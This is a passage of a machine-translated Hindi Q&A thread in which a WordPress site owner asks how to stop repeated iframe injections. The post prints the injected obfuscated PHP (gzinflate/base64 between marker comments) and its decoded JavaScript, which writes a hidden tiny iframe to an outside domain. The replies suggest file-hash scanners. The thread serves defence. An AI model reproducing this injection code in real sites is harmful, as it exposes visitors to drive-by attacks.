में कोड सम्मिलित करता है पिछले कुछ दिनों में, मेरी वेबसाइट बार-बार आईफ्रेम हमले का लक्ष्य रहा है। कोड मुख्य रूप से PHP और जावास्क्रिप्ट पृष्ठों में जोड़ा गया है। (थोड़ा इसे बेअसर करने के लिए मैं कोड बदल दिया है) कोड तो पीएचपी आधार 64 इनकोडिंग, उदाहरण देखें:वेबसाइट आईफ्रेम हमले - स्रोत
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
यह डीकोड इस तरह दिखता है:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
आम बात यह है कि सभी कोड में "# c3284d #" टिप्पणी है इसलिए दुर्भावनापूर्ण कोड को ट्रैक करना मुश्किल नहीं है। लेकिन यह समय लेने वाला है ...
हम ग्रैडवेल (यूके) में एक साझा सर्वर पर हैं और वे विशेष रूप से सहायक नहीं हैं। तो सवाल यह है कि मैं क्या खुद को दोहरा से इस मुद्दे को रोकने के लिए कर सकते हैं? मैं MySQL इंजेक्शन हमलों के बारे में पता कर रहा हूँ और इस तरह के हमलों से सुरक्षा के लिए PHP के mysql_real_escape_string का उपयोग करें।
साइट PHP और MySQL ड्राइव है। हम MySQLFTP का उपयोग करें और SSH पहुँच के लिए एक खोल खाता है। हम वर्डप्रेस का उपयोग करते हैं (प्लगइन डी-एक्टिवेटेड के साथ नवीनतम अपडेट)।
तक पहुंच चुके हैं तो इस तरह के प्रश्न के बारे में बहुत सारे PHP लोअर मौजूद हैं, और मैं आपको इसकी तलाश करने के लिए प्रोत्साहित करता हूं। हालांकि, इस प्रश्न का पार्श्व-विचार जवाब है "[PHP के अलावा कुछ और उपयोग करें।] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP सुरक्षा समस्याओं से अधिक प्रवण है अन्य भाषाओं। –
एक पुराना सवाल है, लेकिन अभी भी इस बिंदु को बनाने लायक है: एक हैश स्कैनर प्राप्त करें और इसे अपने खाते में इंस्टॉल करें। PHP में बहुत कुछ हैं, जो मैं कह सकते हैं। ये क्रॉन का उपयोग यह जांचने के लिए करते हैं कि कौन सी फाइलें नई हैं या बदली हैं, और यदि संदिग्ध परिवर्तन पाए जाते हैं तो आपको ईमेल कर सकते हैं। – halfer